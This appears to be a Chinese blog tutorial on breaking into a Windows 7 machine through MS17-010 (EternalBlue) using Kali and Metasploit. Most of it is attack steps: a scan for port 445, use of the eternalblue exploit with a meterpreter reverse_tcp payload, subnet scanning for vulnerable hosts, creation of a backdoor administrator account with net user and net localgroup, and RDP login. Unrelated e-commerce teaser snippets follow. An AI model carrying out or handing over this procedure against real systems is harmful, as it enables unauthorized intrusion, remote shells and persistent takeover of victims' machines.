ms17-010
ms17-010漏洞利用工具系统入侵(实测)
一、打开kali和win7查看IP。
(1) windows7作为靶机
(2) Kali作为攻击机(最新版kaili)
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。 
三、在kali中输入 msfconsole(等待一会可能会有点慢)
四、进入后输人search ms17-010(就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒)
五、找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue
六、输入show options 查看和配置RHOST(靶机)和LHOST(操作机)
由于我用的是虚拟电脑所以我环境已经配置好了。
如果你不知道那台电脑有漏洞你可以输入set LHOSTS 网关/24
如果是[+]前面是这样说明有漏洞,然后再set RHOST +IP。
七、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp
八、run或exploit进行攻击
这样就进去了。
九、可以创建用户 net user xxxx 1234 /add(xxxx用户名 1234密码)
十、net localgroup adMinistrators xxxx /add (将用户设置为管理员权限)
十一、重新打开一个终端 rdesktop+IP
这样就进去了。
相关阅读
为满足消费者对高性价比优质商品的需要,在今年的3月8号,淘抢购推出了商家自运营的业务,各位卖家们都是可以报名使用的,在接下来的内容
picpick是一款专用于屏幕抓取的图像捕捉工具,它具备了最常用到的基本图像处理功能,同时也自带了许多实用性的辅助功能操作,您可以通
想要获得更多的收入,淘宝客除了要注意技巧、不断加人之外,还要在推广商品量上下功夫,只有增加推广商品的总量,才能增加成交的概率。而
淘宝推广工具有哪些呢?许多朋友不知道到淘宝店铺怎么推广,是因为不知道淘宝推广工具有哪些,所以小编就查找了一下资料,总结了一下淘
淘宝隐形降权查询工具可靠吗?关于隐形降权困惑着很多卖家朋友!五花八门的查询工具不知道哪个真的,其实卖家中心后台的宝贝体检中心,